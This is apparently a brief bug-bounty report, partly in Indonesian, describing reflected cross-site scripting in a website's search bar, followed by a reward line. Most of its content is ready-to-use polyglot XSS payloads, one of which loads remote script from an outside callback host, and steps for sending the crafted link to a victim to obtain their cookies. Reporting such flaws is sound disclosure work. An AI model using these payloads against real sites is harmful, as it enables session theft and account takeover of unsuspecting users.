XSS INFECTED Search Bar

XSS INFECTED
xss yang satu ini lumayan berbahaya karena bekerja pada halaman search

Step :

1.attacker input this script on search bar

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+$.getScript("//nandoxp1.xss.ht")//'> or

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+window.location.replace("http://www.w3schools.com")//'>

or

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(“xss”)//'>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+window.location.replace("http://www.w3schools.com")//'>

2. attacker give to victim

3. when victim open that’s url  , attacker will get cookie information or etc

2.       Proof of concept (POC)**             :

Xss proof

3.Reward:
1000000 By Ipoint